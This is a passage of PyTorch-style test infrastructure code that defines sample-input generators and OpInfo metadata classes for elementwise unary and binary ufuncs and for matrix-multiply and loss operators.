requires_grad=requires_grad ) # TODO: FIXME: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype not in (torch.chalf,): yield from generate_elementwise_binary_broadcasting_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_with_scalar_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) yield from generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype.is_floating_point or dtype.is_complex: yield from generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) # Note that these references inputs use scalars for the SampleInput.input value, # and many tests require SampleInput.input be a tensor or a list of tensors def reference_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) gen = partial( _reference_inputs_elementwise_binary, op, device, dtype, requires_grad, exclude_zero, **kwargs ) # yields "normal" samples yield from gen() # TODO: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype is torch.chalf: return # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_binary_noncontiguous_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # A functional that extends an elementwise binary operator's bespoke error inputs # with generic error inputs for the class of elementwise binary operations def make_error_inputs_elementwise_binary(error_inputs_func): def error_inputs_func_wrapper(op, device, **kwargs): if error_inputs_func is not None: yield from error_inputs_func(op, device, **kwargs) if not op.supports_rhs_python_scalar: si = SampleInput(torch.tensor((1, 2, 3), device=device), args=(2,)) yield ErrorInput(si, error_type=Exception, error_regex="") if not op.supports_one_python_scalar: si = SampleInput(2, args=(torch.tensor((1, 2, 3), device=device),)) yield ErrorInput(si, error_type=Exception, error_regex="") if ( not kwargs.get("skip_two_python_scalars", False) and not op.supports_two_python_scalars ): si = SampleInput(2, args=(3,)) yield ErrorInput(si, error_type=Exception, error_regex="") return error_inputs_func_wrapper # Metadata class for binary "universal functions (ufuncs)" that accept two # tensor and have common properties class BinaryUfuncInfo(OpInfo): """Operator information for 'universal binary functions (binary ufuncs).' These are functions of two tensors with common properties like: - they are elementwise functions - the output shape is determined by the input shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/stable/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, *, sample_inputs_func=sample_inputs_elementwise_binary, reference_inputs_func=reference_inputs_elementwise_binary, error_inputs_func=None, lhs_make_tensor_kwargs=None, rhs_make_tensor_kwargs=None, promotes_int_to_float=False, # Set to true if the op promotes integer inputs to float always_returns_bool=False, # Set to true if the op always returns bool tensors supports_rhs_python_scalar=True, # Whether the operator allows Tensor x scalar inputs supports_one_python_scalar=False, # Whether the operator allows scalar x tensor and tensor x scalar inputs supports_two_python_scalars=False, # Whether the operator allows scalar x scalar inputs **kwargs, ): self._original_binary_ufunc_args = locals().copy() # Elementwise binary operations perform the equivalent of test_numpy_refs # in test_binary_ufuncs, but with additional test granularity. So the # generic test_ops.py test is skipped because it's redundant. common_skips = ( DecorateInfo( unittest.skip("Skipping redundant test."), "TestCommon", "test_numpy_refs", ), ) kwargs["skips"] = kwargs.get("skips", tuple()) + common_skips super(BinaryUfuncInfo, self).__init__( name, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, error_inputs_func=make_error_inputs_elementwise_binary(error_inputs_func), **kwargs, ) # [lr]hs_make_tensor_kwargs are part of the OpInfo to be able to dynamically generate valid samples later on. if lhs_make_tensor_kwargs is None: lhs_make_tensor_kwargs = {} self.lhs_make_tensor_kwargs = lhs_make_tensor_kwargs if rhs_make_tensor_kwargs is None: rhs_make_tensor_kwargs = {} self.rhs_make_tensor_kwargs = rhs_make_tensor_kwargs self.promotes_int_to_float = promotes_int_to_float self.always_returns_bool = always_returns_bool self.supports_rhs_python_scalar = supports_rhs_python_scalar self.supports_one_python_scalar = supports_one_python_scalar self.supports_two_python_scalars = supports_two_python_scalars if self.supports_two_python_scalars: self.supports_one_python_scalar = True if self.supports_one_python_scalar: assert ( supports_rhs_python_scalar ), "Can't support lhs and rhs Python scalars but not rhs scalars!" # The following functions and classes are for testing elementwise unary operators. def sample_inputs_elementwise_unary( op_info, device, dtype, requires_grad, op_kwargs=None, **kwargs ): if not op_kwargs: op_kwargs = {} low, high = op_info.domain low = low if low is None else low + op_info._domain_eps high = high if high is None else high - op_info._domain_eps if op_info.supports_sparse_csr: # Tensors with dim=2 for sparse CSR testing yield SampleInput( make_tensor( (L, L), device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) else: # Creates a 1D, empty, and scalar tensor for shape in ((L,), (1, 0, 3), ()): yield SampleInput( make_tensor( shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) # Replace values satisfying condition with a safe value. This is used to block # out values the could cause singularity like tan(pi/2) def _replace_values_in_tensor(tensor, condition, safe_value): mask = condition(tensor) tensor.masked_fill_(mask, safe_value) # Helper to create a unary elementwise tensor with valid inputs def _make_unary_elementwise_tensor(shape, *, op, dtype, **kwargs): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps a = make_tensor(shape, low=low, high=high, dtype=dtype, **kwargs) if op.reference_numerics_filter is not None and dtype is not torch.bool: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) return a # Restricts the values in the tensor to the domain of the # given elementwise unary operator def _filter_unary_elementwise_tensor(a, *, op): # short-circuits for boolean tensors if a.dtype is torch.bool: return a low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps if a.dtype is torch.uint8 and low is not None: low = max(low, 0) if not a.dtype.is_floating_point and not a.dtype.is_complex: low = math.ceil(low) if low is not None else None high = math.floor(high) if high is not None else None if op.reference_numerics_filter is not None: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) if low is not None or high is not None: if a.dtype.is_complex: a.real.clamp_(low, high) a.imag.clamp_(low, high) else: a.clamp_(min=low, max=high) return a def generate_elementwise_unary_tensors(op, *, device, dtype, requires_grad, **kwargs): # Special-cases bool if dtype is torch.bool: tensors = ( torch.empty(0, device=device, dtype=torch.bool), torch.tensor(True, device=device), torch.tensor(False, device=device), torch.tensor((True, False), device=device), make_tensor((812,), device=device, dtype=dtype), make_tensor((1029, 917), device=device, dtype=dtype), ) for a in tensors: yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) shapes = ( (1029, 917), (812,), # Empty sizes (0,), (0, 3, 3), (1, 0, 5), (6, 0, 0, 0), (3, 0, 1, 0), ) make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) for shape in shapes: a = make_arg(shape) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_small_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_large_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(sample.input, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): yield SampleInput( sample.input, kwargs=op.sample_kwargs(device, dtype, sample.input)[0] ) def generate_elementwise_unary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False ): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) # Generic noncontiguity t = make_arg((1026,), noncontiguous=True) yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Transposed t = make_arg((1024, 1024)).T yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: t = make_arg(shape) t_non_contig = t.expand(3, -1, -1) yield SampleInput( t_non_contig, kwargs=op.sample_kwargs(device, dtype, t_non_contig)[0] ) def generate_elementwise_unary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) # Reuses the elementwise binary generators for consistency # TODO: in the future generalize the reference generators to handle n-ary elementwise operations def _reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_unary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype is not torch.bool: yield from generate_elementwise_unary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype not in (torch.bool, torch.uint8, torch.int8) and ( op.handles_large_floats or (not dtype.is_floating_point and not dtype.is_complex) ): yield from generate_elementwise_unary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype.is_floating_point or (op.handles_complex_extremal_values and dtype.is_complex): yield from generate_elementwise_unary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) def reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): gen = partial( _reference_inputs_elementwise_unary, op, device, dtype, requires_grad, **kwargs ) # yields "normal" samples yield from gen() # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_unary_noncontiguous_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) yield from generate_elementwise_unary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) # Metadata class for unary "universal functions (ufuncs)" that accept a single # tensor and have common properties like: class UnaryUfuncInfo(OpInfo): """Operator information for 'universal unary functions (unary ufuncs).' These are functions of a single tensor with common properties like: - they are elementwise functions - the input shape is the output shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/1.18/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, domain=(None, None), # the [low, high) domain of the function handles_complex_extremal_values=True, # whether the op correctly handles extremal values (like nan/inf) handles_large_floats=True, # whether the op correctly handles large float values (like 1e20) supports_complex_to_float=False, # op supports casting from complex input to real output safely eg. angle sample_inputs_func=sample_inputs_elementwise_unary, reference_inputs_func=reference_inputs_elementwise_unary, sample_kwargs=lambda device, dtype, input: ({}, {}), supports_sparse=False, reference_numerics_filter=None, # Filters values in the range of the domain specified above but that should not be tested **kwargs, ): self._original_unary_ufunc_args = locals().copy() super(UnaryUfuncInfo, self).__init__( name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, supports_sparse=supports_sparse, **kwargs, ) self.ref = ref self.domain = domain self.handles_complex_extremal_values = handles_complex_extremal_values self.handles_large_floats = handles_large_floats self.supports_complex_to_float = supports_complex_to_float self.reference_numerics_filter = reference_numerics_filter # test_unary_ufuncs.py generates its own inputs to test the consistency # of the operator on sliced tensors, non-contig tensors, etc. # `sample_kwargs` is a utility function to provide kwargs # along with those inputs if required (eg. clamp). # It should return two dictionaries, first holding kwarg for # torch operator and second one for reference NumPy operator. self.sample_kwargs = sample_kwargs # Epsilon to ensure grad and gradgrad checks don't test values # outside a function's domain. self._domain_eps = 1e-5 def sample_inputs_add_sub(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds alpha kwarg cases make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': 2}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': True}) neg_alpha = -3.14 if (dtype.is_floating_point or dtype.is_complex) else -3 lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': neg_alpha}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': False}) def sample_inputs_isclose(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Creates additional inputs to test the rtol, atol, and equal_nan params rtols = [0., 1e-7] atols = [0., 1e-7] equal_nans = [False, True] products = product(rtols, atols, equal_nans) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for rtol, atol, equal_nan in products: lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,), kwargs=dict(rtol=rtol, atol=atol, equal_nan=equal_nan)) def sample_inputs_t(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((1, 2))), SampleInput(make_arg((2,))), SampleInput(make_arg(()))) def sample_inputs_mm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) first_shape, second_shape = (S, M), (M, S) yield SampleInput(make_arg(first_shape), args=(make_arg(second_shape),)) if dtype.is_complex: yield SampleInput(make_arg(first_shape), args=(make_arg_conj(second_shape),)) def sample_inputs_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha_val = kwargs.get('alpha', 2 + 3j if dtype.is_complex else 0.6) beta_val = kwargs.get('beta', 1 + 2j if dtype.is_complex else 0.2) tests_list = [ ((2, 3), (2, 2), (2, 3), False) ] tests_with_lhs_broadcasting = [ ((1,), (2, 2), (2, 3), True), ((), (2, 2), (2, 3), True) ] test_cases = tests_list + tests_with_lhs_broadcasting # type: ignore[operator] sample_inputs = [] for shape_a, shape_b, shape_c, broadcasts_input in test_cases: sample_inputs.append( SampleInput( make_tensor(shape_a, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape_b, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape_c, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val}, broadcasts_input=broadcasts_input)) if dtype.is_complex: shape = (3, 3) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad), make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) return sample_inputs def sample_inputs_sparse_sampled_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha = 2 + 3j if dtype.is_complex else 0.6 beta = 1 + 2j if dtype.is_complex else 0.2 def generator(): # sparse.sampled_addmm performs: alpha * (A @ B) * sparse_ones_like(C) + beta * C for m, n, k in itertools.product([0, 5], repeat=3): yield SampleInput( torch.eye(m, n, device=device, dtype=dtype) .to_sparse_csr() .requires_grad_(requires_grad), args=( make_tensor( (m, k), device=device, dtype=dtype, requires_grad=requires_grad, ), make_tensor( (k, n), device=device, dtype=dtype, requires_grad=requires_grad, ), ), kwargs={"alpha": alpha, "beta": beta}, ) return list(generator()) def sample_inputs_mv(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_bmm(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, M, S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_dot_vdot(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) sample_inputs = [] sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg((S, )),))) if dtype.is_complex: # dot/vdot for (conj(input), conj(arg_tensor)) and (conj(input), arg_tensor) # is tested in test_conj_view (which tests operations with only conjugated input tensor # -- not conjugated arg tensors) sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg_conj((S, )),))) return sample_inputs def sample_inputs_addmv(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = (((S,), (S, M), (M,), 1, 1, False), ((S,), (S, M), (M,), 0.2, 0.6, False), ) test_cases_with_broadcast = (((1,), (S, M), (M,), 1, 1, True), ((1,), (S, M), (M,), 0.2, 0.6, True), ((), (S, M), (M,), 1, 1, True), ((), (S, M), (M,), 0.2, 0.6, True), ) cases = test_cases + test_cases_with_broadcast # addmv performs: beta * M + alpha * (mat @ vec) for size, mat, vec, beta, alpha, broadcasts_input in cases: yield SampleInput(make_arg(size), args=(make_arg(mat), make_arg(vec)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input) def sample_inputs_addbmm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input_shape, batch1_shape, batch2_shape, beta_val, alpha_val, is_broadcasting test_cases = [((S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] for input_shape, batch1_shape, batch2_shape, beta, alpha, is_broadcasting in test_cases: if dtype.is_complex: beta_complex, alpha_complex = beta * (1 + 2j), alpha * (2 + 3j) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta_complex, alpha=alpha_complex), broadcasts_input=is_broadcasting) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=is_broadcasting) def sample_inputs_addcmul_addcdiv(op_info, device, dtype, requires_grad, **kwargs): test_cases = [(((S, S), (S, S), (S, S)), False), (((S, S), (S, 1), (1, S)), False), (((1,), (S, S, 1), (1, S)), True), (((), (), ()), False), (((S, S), (), ()), True), (((), (S, S, 1), (1, S)), True) ] sample_inputs = [] for input_args, broadcasts_input in test_cases: # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], broadcasts_input=broadcasts_input)) # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], kwargs=dict(value=3.14), broadcasts_input=broadcasts_input)) return tuple(sample_inputs) def sample_inputs_baddbmm(op_info, device, dtype, requires_grad, **kwargs): test_cases = [((S, S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] sample_inputs = [] for (input_shape, batch1_shape, batch2_shape, alpha, beta, broadcasts_input) in test_cases: args = (make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch1_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch2_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append(SampleInput(args[0], args=(args[1], args[2]), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input)) if dtype.is_complex: sample_inputs.append(SampleInput( args[0].clone().requires_grad_(requires_grad), args=(args[1].clone().requires_grad_(requires_grad), args[2].clone().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)), broadcasts_input=broadcasts_input)) if dtype.is_complex: shapes = [(S, S, S), (S, M, S), (S, S, M)] args = (make_tensor(shapes[0], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[1], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[2], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append( SampleInput( args[0].transpose_(-1, 1), args=(args[1].transpose(-1, 1).conj().requires_grad_(requires_grad), args[2].transpose(-1, 1).conj().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)),)) return tuple(sample_inputs) # TODO: add reduction kwargs def sample_inputs_multilabel_soft_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (S,), (S, S), ) for shape in shapes: # Produce one with weight and one without. yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={}) yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={'weight': _make_tensor(shape, requires_grad=False)}) def sample_inputs_addr(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), broadcasts_input=True) if dtype.is_complex: alpha, beta = 0.1 + 0.3j, 0.4 + 0.6j elif dtype.is_floating_point: alpha, beta = 0.2, 0.6 else: alpha, beta = 2, 3 yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha)) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=True) # These samples fail gradcheck if dtype.is_floating_point and not requires_grad: yield SampleInput( torch.tensor([[math.nan]], device=device, requires_grad=requires_grad), args=( torch.tensor([0.0], device=device, requires_grad=requires_grad), torch.tensor([0.0], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) yield SampleInput( torch.tensor([[0.0]], device=device, requires_grad=requires_grad), args=( torch.tensor([math.nan], device=device, requires_grad=requires_grad), torch.tensor([math.nan], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) def sample_inputs_zero_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ((), (S, S, S), (S,)) for shape in cases: yield(SampleInput(make_arg(shape))) # TODO: add reduction kwargs def sample_inputs_multi_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ((), make_target([], low=0, high=1), {}), ((S,), make_target([], low=0, high=S), {"p": 1}), ((S,), make_target([1], low=0, high=S), {"p": 2}), ((S, M), make_target([S], low=0, high=M), {"margin": 1.0}), ((M, S), make_target([M], low=0, high=S), {"weight": None}), ) for input_shape, target, kwargs in inputs: yield SampleInput(_make_tensor(input_shape), args=(target,), kwargs=kwargs) def sample_inputs_logsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((), (0,), True), ((S, S), (1,), True), ((S, S), (1,), False), ((S, S), (-2,), False), ) samples = [] # Test large inputs to check numerical stability lows = (None, 1e3, 1e6) if dtype in (torch.float32, torch.float64) else (None,) for low in lows: high = low * 2 if low is not None else None for shape, dim, keepdim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples.append(SampleInput(t, args=(dim, keepdim))) return tuple(samples) def sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), {}), ((S, S), {}), ((0, S, 0), {}), ((S,), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), {'dtype': torch.double}), ((S,), {'device': 'cpu'}), ((S,), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), {'device': 'cuda'})) samples = [] for shape, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, kwargs=kwargs)) return tuple(samples) def reference_inputs_like_fns(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_like_fns(op, device, dtype, requires_grad, **kwargs) # shape cases = ( (), (0,), (1, 0), (1, 1, 4, 5), (5, 3, 0, 1), (1, 4, 3, 1, 1) ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in cases: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # TODO: add reduction kwargs def sample_inputs_multilabel_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ([], make_target([], low=0, high=1)), ([S], make_target([S], low=0, high=S)), ([M, S], make_target([M, S], low=0, high=S)), ) for shape, target in inputs: yield SampleInput(_make_tensor(shape), args=(target,)) def get_independent_tensor(tensor): return tensor.clone().requires_grad_(tensor.requires_grad) def sample_inputs_randint_like(self, device, dtype, requires_grad, **kwargs): samples = [] low = 2 high = 10 for sample in sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): # With high samples.append(SampleInput( sample.input, args=(high,) + sample.args, kwargs=sample.kwargs)) # With low and high samples.append(SampleInput( get_independent_tensor(sample.input), args=(low, high,) + sample.args, kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_margin_ranking_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (), (S,), (S, S), (S, S, S), ) margins = (0., 1.) reductions = ('sum', 'mean', 'none') for shape in shapes: for margin, reduction in product(margins, reductions): kwargs = {'margin': margin, 'reduction': reduction} yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False), _make_tensor(shape, requires_grad=False)), kwargs=kwargs) def reference_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in 